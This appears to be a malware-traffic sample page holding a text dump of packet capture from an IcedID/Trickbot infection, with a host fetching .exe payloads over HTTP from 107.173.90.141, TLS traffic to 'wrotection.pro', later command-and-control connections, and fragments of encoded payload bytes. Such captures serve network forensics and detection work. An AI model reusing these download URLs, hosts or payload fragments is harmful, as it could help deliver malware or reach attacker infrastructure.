Text Example

IcedID Iced ID and Trickbot Banking Malware Trojan Downloader Dropper PCAP file download traffic sample

Download Attachments

2019-08-12 14:04:16.655885 IP 10.8.12.101.49224 > 179.60.144.143.443: Flags [P.], seq 1:119, ack 1, win 64240, length 118
E…. @…..
..e.<…H…4E…D.P…E…….q…m..]Q. k…,..V…kl…k…..$….!…./.5… ….. . .2.8…….,…………..wrotection.pro. ………….. 2019-08-12 14:04:16.655968 IP 179.60.144.143.443 > 10.8.12.101.49224: Flags [.], ack 119, win 64240, length 0
E..(. …..v.<.. ..e…H..D..4FWP….2.. 2019-08-12 14:04:16.841099 IP 179.60.144.143.443 > 10.8.12.101.49224: Flags [P.], seq 1:810, ack 119, win 64240, length 809
E..Q.!…..L.<..
..e…H..D..4FWP………..Q…M……W……g…:…p…../.*…Z …m….s.G.Z..sN6~.._.d..V=.._a./…………………..0…0.. …… ..d…..&0.. *.H……..0s1.0 ..U….US1.0 ..U….NJ1.0…U.
..belles fogginess’s1.0…U….introversion’s cashier1.0…U….indecisively.org0…190630040001Z..200629040001Z0s1.0 ..U….US1.0 ..U….NJ1.0…U.
..belles fogginess’s1.0…U….introversion’s cashier1.0…U….indecisively.org0..0.. .H…………0……..Q…X.)t5X…..5..}}..7..5……..[……#…5.....H...$..|Z4.....QB}S.......u.pJh.../6h.......IC....o.H.3.{............/b........S0Q0...U......|{..q..nb......f.AP.0...U.#..0...|{..q..nb......f.AP.0...U.......0....0.. *.H.............3.A....7Z;.E.V....A..m..B.d..H......j..N[.P?..aQ....N...k..D..............v4.fk.L. kwr.:.U..[@.j...{~f..+Hg.........."n…………….

2019-08-12 14:04:22.653444 IP 10.8.12.101.49226 > 107.173.90.141.80: Flags [P.], seq 1:79, ack 1, win 64240, length 78: HTTP: GET /SWKLPFVBDS.exe HTTP/1.1
E..v.:@…..
..ek.Z..J.P…/e..&P….i..GET /SWKLPFVBDS.exe HTTP/1.1
Connection: Keep-Alive
Host: 107.173.90.141

2019-08-12 14:04:22.653480 IP 107.173.90.141.80 > 10.8.12.101.49226: Flags [.], ack 79, win 64240, length 0
E..(.V….^.k.Z.
..e.P.Je..&…}P…….
2019-08-12 14:04:22.653825 IP 107.173.90.141.80 > 10.8.12.101.49227: Flags [S.], seq 1652259580, ack 1389350972, win 64240, options [mss 1460], length 0
E..,.W….^.k.Z.
..e.P.Kb{z.R..<`….^…… 2019-08-12 14:04:22.653923 IP 10.8.12.101.49227 > 107.173.90.141.80: Flags [.], ack 1, win 64240, length 0
E..(.;@…..
..ek.Z..K.PR.. 107.173.90.141.80: Flags [P.], seq 1:74, ack 1, win 64240, length 73: HTTP: GET /Tin64.exe HTTP/1.1
E..q.<@…..
..ek.Z..K.PR..<b{z.P…=!..GET /Tin64.exe HTTP/1.1
Connection: Keep-Alive
Host: 107.173.90.141

2019-08-12 14:04:22.654025 IP 107.173.90.141.80 > 10.8.12.101.49227: Flags [.], ack 74, win 64240, length 0
E..(.X….^.k.Z.
..e.P.Kb{z.R…P…….
2019-08-12 14:04:22.658025 IP 107.173.90.141.80 > 10.8.12.101.49228: Flags [S.], seq 848954188, ack 3386416125, win 64240, options [mss 1460], length 0
E..,.Y….^.k.Z.
..e.P.L2..L….`…d%……
2019-08-12 14:04:22.658306 IP 10.8.12.101.49228 > 107.173.90.141.80: Flags [.], ack 1, win 64240, length 0
E..(.=@…..
..ek.Z..L.P….2..MP…{…
2019-08-12 14:04:22.658387 IP 10.8.12.101.49228 > 107.173.90.141.80: Flags [P.], seq 1:72, ack 1, win 64240, length 71: HTTP: GET /tin.exe HTTP/1.1
E..o.>@…..
..ek.Z..L.P….2..MP…….GET /tin.exe HTTP/1.1
Connection: Keep-Alive
Host: 107.173.90.141

2019-08-12 14:04:22.658419 IP 107.173.90.141.80 > 10.8.12.101.49228: Flags [.], ack 72, win 64240, length 0
E..(.Z….^.k.Z.
..e.P.L2..M…DP…{…
2019-08-12 14:04:22.658818 IP 107.173.90.141.80 > 10.8.12.101.49229: Flags [S.], seq 2043162382, ack 4219249562, win 64240, options [mss 1460], length 0
E..,.[….^.k.Z.
..e.P.My./..|..`………..
2019-08-12 14:04:22.658925 IP 10.8.12.101.49229 > 107.173.90.141.80: Flags [.], ack 1, win 64240, length 0
E..(.?@…..
..ek.Z..M.P.|..y./.P…….
2019-08-12 14:04:22.659036 IP 10.8.12.101.49229 > 107.173.90.141.80: Flags [P.], seq 1:74, ack 1, win 64240, length 73: HTTP: GET /Tin86.exe HTTP/1.1
E..q.@@…..
..ek.Z..M.P.|..y./.P…….GET /Tin86.exe HTTP/1.1
Connection: Keep-Alive
Host: 107.173.90.141

2019-08-12 14:04:22.783970 IP 107.173.90.141.80 > 10.8.12.101.49229: Flags [.], seq 21901:23361, ack 74, win 64240, length 1460: HTTP
E………X.k.Z.
..e.P.My….|..P….-…………………@……. ……………CWindowDock Demo – Child 2..CWindowDock Demo – Child 1..CWindowDock Demo – Parent…Fa7b$~m?aEdng?hWoWA$Q0?1#7~fcD9h5k.1M@ijUEYlfckR2…..E+rb48gCbj9hFjI5j/ZqV2/cscyHMj8xmXmyuXHP9+PNwpxEYTfYSyGizOgAmOWp14BVb1f7S6XAi7rtvKaOuUY5aI+zUCKWvieY9aPXqkdkbt2rw/v33gTw2v/XjSE3ftxh+dcJvG+nza/fzyZ+bYUFwrNj7nrc3KG/3yZRMIVE/W4Y7yaYsqbdpWlGYY2ZLeJetiSh76GPv2pXb+3aHzVHtnSTvLCOEkY5aI9KWIFdvif89aPXA0dkbt3l4y3B3gT02v7XYiE3ftwob0tvvG+Tza/fJiZ+bYUMIAqr7nqg3KG/dCZRMIUtnRlO7yaAsqbdDGlGYY1ZQVJxtK7OlIZ/PWhXBUfK3Nx111sjZ4GxCQC07WXVlLkLNzLbqQXzY0Vk4+K7lKiQPUF0rudVKa5y6gxjFMa/vmdjxaUHpaH6kcCeQmRvZ7QpawVTQuU5MA8xI747pgtAOGg1JdwGdV1irTvVwLcvYOWXVWgBkIDC4F0DwFkgNn5mNRPGu7DqZMIqNmIk8yjXMcjhPpjAlwc4ACkgUTA3ZnRggTOnFG+XYJbuhm6zYiV+bbLkwZiRmG+XIoOoFPDU8DC1yDd+ZjS7bNxl1R6unmKuob5iurlFZG7sYqg9Lz9BFFEwwEJzyA1SnDHRl2D24gOBsqIr+to/YUXvG4NolyQ7qDQsAc9K2dzh+6ZswKZoNSpYhgcMISINQLISaWcb37RuVCpfKySuRsNhqHGGZSakaZdAwpQThTjVZ3jgSUkCX5Yb4+Mii9oEiGLPb1s7ujvyMxPGHd3VPvbk9xd3KQc77ACEPux68NSvXxHbJNjA56b3ClroBxFrcMriw1XKndvz6Ludups+mEqEqDqPxOQlL8BEz8grtugZwe31Xn65FN+d94EY056W7xubaJeBhFHKeam7Ss2gSpZmF0hul0DClBOpyBfMgb68HKlkGmLAHbuQhBbbh29haqjSI6RrRF3JBSprRup3bq8+ebRhzmTlJy+rM85nQSRRu389qHdq7WPPeXj2GbmtcfaoKUIMMN+FGG3k10hUvxbLJdXwStuo9b0z6Ki6hCV5PRHqzutxgl7J6gJY5SMHEFSo3BEE2mgjMvS8NkJgm7IoLSmkzzTD62mO5HqZwKQaf7Rk5WyYqYWuz8AKZssKdOgRzS4OX5M0iQSieyA2tIQYp+Uiz2fgayfKINIz+NrI……..E+rb48hWbz9hxhliZ0Fu1BJbUVpWA//YqTp+Zu4BsTi4Z+8XibBvJH7u+2mDIeJn+e03k
2019-08-12 14:04:22.783982 IP 107.173.90.141.80 > 10.8.12.101.49229: Flags [.], seq 23361:24821, ack 74, win 64240, length 1460: HTTP
E………X.k.Z.
..e.P.My..O.|..P….z..Ki+UZe1Xs7cyA2g5ibGl8pPrcMCyJ3bDKu6BbqbkVT57TKQqL4Wl7VZztzIfqDmLMaXymetwwjIndsbq7oLupuRFPntPJCovleXtVPO3MgfoOYpxpfKTa3DD8id2xurug66m5El+e0nkKi+S5e1Ts7cyAag5jbGl8prrcMSyJ3bfqu6gbibkQb57baSqL5Al7XdzNzICKDmp8SXykutw4XKndsOq7qEuJuRDvntsZKovheXtdjM3MhMoOasxJfKBK3DiMqd2xqruou4m5EL+e28kqi+SJe108zcyH6g5rTEl8pprcOQyp3bDKu6k7ibkR757aSSqL5Ul7XLzNzICqDmscSXymutw5fKndsdq7qWuJuRFvntr5KovlGXtcbM3MgXoOa+xJfKWK3Dmsqd2xurup24m5Ek+e2qkqi+S5e1wczcyBCg5rvEl8percNhyZ3bG6u6YLubkR/57VWRqL5Ql7U8z9zIP6DmQMeXyiqtwxXInds9q7oUupuRFfntIZCovl2XtUjO3MgOoOY8xpfKXq3DGMid2zeruhu6m5EK+e0skKi+VJe1Q87cyBGg5jnGl8pYrcMfyJ3bCqu6HrqbkSz5LdcKkQSlKPZ6syPx+yqcu8Yr868muZ7IEOL7I8Ceuh2o4nCXqJAnh6EBz8DOV/H7N5y7xi3zrzm5nsgM4vs+wJ66B6jia5eokCWHoQTPwM5a8fswnLvGGPOvPLmeyBbi+zXAnrpk4/LflaiQBb5x1bl6pa6yjpucu2njeL46uTS/62Hi4KoVupuRNbQtwz+oFKzYdZ+8rnuBmZwVsj2heJQT6b4ngLjoL5+6m2mhunmpkKhD4tQiwc7cN7jjcLrGlzXs7lKfyJ0kuOgqn7qbyqG6fqmQqEHi1CfBztw3uON7usaXZ+zuX5/InXe46CWfupsvobpzqZCoc+LULMHO3De44366xpc37O5Yn8idJLjoIJ+6m26hukipkKhA4tQRwc7cN7jjQbrGlzXs7mWfyJ0kuOgbn7qbxaG6TamQqK7i1BbBztzNuONEusaX8+zubp/InVm46BafupuGobpCqZCon+LUG8HO3My440+6xpdd7O5rn8idHLjoEZ+6m2ehukepkKjT4tQAwc7c7rjjUrrGl3fs7nSfyJ1auOgMn7qbBaG6XKmQqMji1AXBztypuONVusaXFOzucZ/InfO46Aefups8obpRqZCoXeLUCsHO3K6441i6xpcJ7O56n8idM7joAp+6myahulapkKgP4tQPwc7cDbjjI7rGl3Hs7gefyJ0muOh9n7qbnKG6K6mQqLvi1HTBztxDuOMmusaXYuzuAJ/Inf646HifupuKobogqZCokuLUecHO3Pe44ym6xpcA7O4Nn8idQ7joc5+6m5ShuiWpkKgv4tR+wc7c6LjjLLrGl03s7hafyJ1ouOhun7qbG6G6OqmQqHTi1GPBztwru
2019-08-12 14:04:22.783983 IP 10.8.12.101.49227 > 107.173.90.141.80: Flags [.], ack 32121, win 64240, length 0
E..(.^@…..
..ek.Z..K.PR…b{.uP….Z..
2019-08-12 14:04:22.783993 IP 107.173.90.141.80 > 10.8.12.101.49229: Flags [P.], seq 24821:26281, ack 74, win 64240, length 1460: HTTP
E………X.k.Z.
..e.P.My….|..P…F…OM3usaXlezuE5/InVC46Gmfupsnobo/qZCoouLUaMHO3Be44zq6xpcm7O4cn8idVbjoZJ+6m1uhujSpkKgk4tRtwc7c6LjjPbrGlyfs7hmfyJ0EuOhfn7qbm6G6CamQqLTi1FLBztzCuOMAusaX9OzuIp/Incm46FqfupsyoboOqZCo0OLUV8HO3AG44wu6xpdA7O4vn8idlLjoVZ+6m8ehugOpkKjd4tRcwc7cM7jjDrrGl+7s7iifyJ0ouOhQn7qb4qG6GKmQqP7i1EHBztyuuOMRusaXQOzuNZ/InTe46EufupsQobodqZCoxuLURsHO3Le44xS6xpd+7O4+n8idVbjoRp+6m/qhuhKpkKj54tRLwc7cN7jjH7rGl5Xs7jufyJ1ZuOhBn7qb2aG6F6mQqBLi1LDBztzquOPiusaXFezuxJ/InUe46LyfupuAobrsqZCotuLUtcHO3LS44+W6xpd07O7Bn8id2rjot5+6m3ihuuGpkKjm4tS6wc7cWbjj6LrGl+rs7sqfyJ0FuOiyn7qbE6G65qmQqDfi1L/Bztz3uOPzusaXsOzu15/InfG46K2fupsLobr7qZCoPuLUpMHO3De44/a6xpcW7O7Qn8idc7joqJ+6myuhuvCpkKgT4tSpwc7cNbjj+brGl6js7t2fyJ3OuOijn7qbB6G69amQqO3i1K7BztwouOP8usaXyOzu5p/InRu46J6fupviobrKqZCoC+LUk8HO3Oe448e6xpc07O7jn8idJLjomZ+6m26hus+pkKhB4tSYwc7cN7jjyrrGlzXs7uyfyJ0kuOiUn7qbbqG6xKmQqEHi1J3Bztw3uOPNusaXNezu6Z/InSS46I+fuptuobrZqZCoQeLUgsHO3De449C6xpc17O7yn8idJLjoip+6m26hut6pkKhB4tSHwc7cN7jj27rGlzXs7v+fyJ0kuOiFn7qbbqG606mQqEHi1IzBztw3uOPeusaXNezu+J/InSS46ICfuptuobqoqZCoQeLU8cHO3De446G6xpc17O6Fn8idJLjo+5+6m2+huq2pkKhB4tT2wc7cN7jjpLrGlzXs7o6fyJ0kuOj2n7qbbqG6oqmQqEHi1PvBztw3uOOvusaXNezui5/InSS46PGfuptuobqnqZCoQeLU4MHO3De447K6xpc17O6Un8idJLjo7J+6m26hurypkKhB4tTlwc7cN7jjtbrGlzXs7pGfyJ0kuOjnn7qbbqG6samQqEHi1OrBztw3uOO4usaXNezump/InSS46OKfuptuobq2qZCoQeLU78HO3De444O6xpc17O6nn8idJLjo3Z+6m26huoupkKhB4tTUwc7cU7jjhrrGl+Ds7qCfyJ2OuOjYn7qb36G6gKmQqOfi1NnBztw0uOOJusaXLezurZ/Inba46NOfupttobqFqZCo6+LU3sHO3Aa444y6xpcb7O62n

2019-08-12 14:14:56.835089 IP 10.8.12.2.60171 > 185.183.96.213.443: Flags [P.], seq 4809:6269, ack 1931, win 65535, length 1460
E…:.@…..
…........)a..t..P...F……”….[…>.:.8. .E8..[ 3…..K… 6......H..M...+.......K.>.5b.......QE...p.....aR.......q….4….R…….c.%.v.”….}…..M…6…beD.a1d……. …R………..De…MY…X.KO..TN.F...>.Ns.x..s..w..e.m..e.m. .z......{..[.4.b.).@J...?-.;} .,.6...8.m..e0.yZ.[..I{.4..?4.n,..#Sk...lv....CX.wB.,H........ ..H9ib......|bO@...._U..:.{DL-Yd..r...n<.?...$....?.....=..'.pvqD.{ .~j..0J...?q.KM..C..+C....o.}..V...O...Hc.........1....'$>....P..z...b.P..... n1.%...D.......1...c..6..."]. .J:.n.[O-.A......N...(.VD.6....vLXt..r...1.J.F1.B.u.....^......(....H.....l.=af.].c...C.9C.r.......P.1..X5.r......BB.2..?h..#..._.qZ....ou.^p.a^g...V....[9......k\[wl.!i6..7...{.A<.n.'..j...BQ..g....v..!..:A....GT.4.....W.jI .V._cM9._..\ .Ka..y..sN.*..flF..D.. \.=..,.8[oG...{gVL.... 6y.Z....N...6X..........a....#..(.......Q.s...\S..c5.._cM.^.....[..\.V..o….x.Mv.6,.r.+…….O..R…B..2&&.K%….:A..n.E .BI.H.8L..e..’….T.Z.y 2w/F..d.;.0L…?……5…).K..g)..v!.B..:?f…….L..[…;..@…)….F…N…Y.”.6>..ai@….[.,.g..&… }..$…………....i..0.8./.Zid |m[....[n........|..ay/|.:.Z~.A...Y...........!)..Y*Mo.])...N........Hs.......c..v......H2.&e....#9..6_.......4x...O I.t.:...I..b......j..8.Cxk.m.C.u...s.K......$..w..k5...._....{T....98...R...I.....4.w.).0@.......cl.Ph,.+u..>~W ..x.;3..q|e.8...qW?..d4..?..i.dw...F..W.~.K......bG......~.f.....G.R.:L.#...r.-.........lG......U.)..B......st.iE....S7.+...0~...2Z..I.W.u{.............8\.o..S7...}D.C.f[ 2019-08-12 14:14:56.835150 IP 185.183.96.213.443 > 10.8.12.2.60171: Flags [.], ack 6269, win 64240, length 0 E..(;......b... ……..t…)g.P…zQ.. 2019-08-12 14:14:56.835172 IP 10.8.12.2.60172 > 185.70.40.151.443: Flags [.], ack 6825, win 65535, length 0 E..(:.@….. ….F(……:ka. 4=P…vC.. 2019-08-12 14:14:56.835251 IP 10.8.12.2.60171 > 185.183.96.213.443: Flags [P.], seq 6269:6896, ack 1931, win 65535, length 627 E…:.@….. …........)g..t..P....9...x....4.A.~. ...K...&....f....].......=...s.{.95....4..oE...RH..MM.R...D...\..E.TDYV0.koM.9.. ..N.........8....~.]..}(G..... ...Iyvb....@e.M....Q>eW..=m...$..S.1S^.....62...2D.s}.m..._..<..m......_..].q~..x..,N...aIE.Q.g..MZi.99./.T.c...s...F~U....:..?e...).'2T.]&.#...IL\...gv..,}..i{_....&..fGel.T.]...r.....b.W1.....W..u.....KlS".7>..”.=..!..C..;..r..F..x…)…..?8… …d..i.R..6.}u..a…….u#.w^nw.Z.c%…IOL.-…gJ……bH6).Dh%.v…’F……c.6….&.lZ….A…r..D….H/]C.r.H…../..r~9 C.g..N[l/..9......":.._.G.9r\b....!.......G&............<.. .P....of.;…..:.pB…3.~q<….(.S.:…f..x.7 H./%……p.<…h. 2019-08-12 14:14:56.835276 IP 185.183.96.213.443 > 10.8.12.2.60171: Flags [.], ack 6896, win 64240, length 0
E..(;……a... ........t...)j.P...w... 2019-08-12 14:14:57.185963 IP 185.183.96.213.443 > 10.8.12.2.60171: Flags [FP.], seq 1931, ack 6896, win 64240, length 0 E..(;......... ........t...)j.P...w... 2019-08-12 14:14:57.186113 IP 10.8.12.2.60171 > 185.183.96.213.443: Flags [.], ack 1932, win 65535, length 0 E..(:.@....G .....……)j..t..P…r…
2019-08-12 14:14:57.186214 IP 10.8.12.2.60172 > 185.70.40.151.443: Flags [F.], seq 1905, ack 6825, win 65535, length 0
E..(:.@…..
….F(……:ka. 4=P…vB..
2019-08-12 14:14:57.186317 IP 185.70.40.151.443 > 10.8.12.2.60172: Flags [.], ack 1906, win 64239, length 0
E..(;……..F(.
…….. 4=.:kbP…{R..
2019-08-12 14:14:57.331011 IP 185.183.96.213.443 > 10.8.12.2.59830: Flags [P.], seq 782:827, ack 80, win 64240, length 45
E..U;……1... .........9Q5...P..............%....18FC78E29C1478DA645838C4DD2B2195. 2019-08-12 14:14:57.331471 IP 10.8.12.2.60174 > 185.183.96.213.443: Flags [S], seq 1476129128, win 65535, options [mss 1460,nop,wscale 4,nop,nop,sackOK], length 0 E..4:.@....9 .....…..W..h………P…………..

Leave a Reply